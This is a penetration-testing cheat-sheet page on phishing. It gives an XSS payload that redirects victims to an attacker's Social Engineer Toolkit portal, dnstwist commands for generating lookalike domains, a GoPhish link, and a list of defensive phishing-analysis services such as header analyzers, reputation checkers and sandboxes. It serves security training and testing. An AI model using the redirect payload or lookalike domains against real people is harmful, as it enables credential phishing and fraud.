Pentest Tips
  • ABOUT
  • Information Shares
  • CTF
    • Stego
    • Memory
  • Blue Team
    • Tools/Resources
    • One Liners
    • Threat Hunting
    • Scripts
    • Intrusion
  • Web
    • Resources
    • General Web
    • Subdomain Discovery
    • Content Discovery
    • MYSQL
    • Burpsuite
  • Network Exploitation
    • Resources
    • Kerberos
    • Network Based
    • Phishing
    • Metasploit
    • Weaponization
    • Password Cracking
    • Shell Upgrades
    • Linux PrivEsc
    • Windows PrivEsc
    • Windows Persistence
    • Exfiltration
  • Windows Internals
    • Kernal
  • Recon
    • Nmap
    • OSINT
    • SMB Enumeration
    • LDAP
    • Physical
  • Malware
    • Obfuscation
  • Scripting
    • Bash Basics
    • Powershell Basics
  • Cloud
    • AWS
  • Game Hacking
    • Resources
Powered by GitBook
On this page
  • Social Engineer Toolkit (SET):
  • Generate Similar Domains
  • GoPhish
  • Analysis
  • Message Headers
  • IP/Web Reputation:
  • URL Info:
  • Attachments (Hashes):
  • Sandboxes:
  • MX:
Edit on GitHub
  1. Network Exploitation

Phishing

PreviousNetwork BasedNextMetasploit

Last updated 2 years ago

Social Engineer Toolkit (SET):

From XSS To SET Portal: <script>window.location.replace("http://<attacker Domain>")</script>

Generate Similar Domains

dnstwist <domain> > similarDomains.txt
grep -iv "homoglyph" similarDomains.txt > Domains.txt

GoPhish

Phishing campaigns made easy:

Analysis

Message Headers

IP/Web Reputation:

URL Info:

Attachments (Hashes):

Sandboxes:

MX:

Social Engineer Toolkit (SET)
https://getgophish.com/
Google Email Header Analysis
Message Header Analyzer
MailHeader.org
ipinfo.io
https://urlscan.io/
https://talosintelligence.com/reputation
URL2PNG
Wannabrowser
https://www.convertcsv.com/url-extractor.htm
https://phishtank.com/?
https://www.virustotal.com/gui/
https://talosintelligence.com/talos_file_reputation
https://app.any.run/
https://www.hybrid-analysis.com/
https://www.joesecurity.org/
PhishTool
https://mxtoolbox.com/